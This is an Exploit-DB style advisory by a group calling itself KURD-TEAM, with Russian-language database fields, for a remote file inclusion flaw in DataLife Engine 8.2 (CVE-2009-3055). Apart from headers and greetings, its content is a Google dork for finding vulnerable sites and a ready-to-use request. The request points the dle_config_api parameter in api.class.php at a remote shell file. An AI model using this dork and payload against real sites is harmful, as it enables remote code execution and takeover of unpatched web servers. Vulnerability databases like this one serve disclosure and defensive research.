Exploit DataLife Engine 8.2 - dle_config_api Remote File Inclusion

[Exploiter]

EDB-ID

9572

Проверка EDB

1. Пройдено

Автор

KURD-TEAM

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2009-3055

Дата публикации

2009-09-01

======================================================
DatalifeEngine 8.2 Remote File Inclusion Vulnerability
 
<<!>> Found by  :  kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
                  
<<!>> Groups : Kurd-Team
<<!>> site   : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script   :: DatalifeEngine8.2
<<->> home script :: http://dlecms.com/download/DatalifeEngine8.2.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> google dork : Powered By DataLife Engine
<<->> Exploit ::
 
 >>> www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]
 
 
=======================================================
 
=======================================================
<<->> All freinds , Zryan_kurd , RootSyS all member kurdish hackers team

# milw0rm.com [2009-09-01]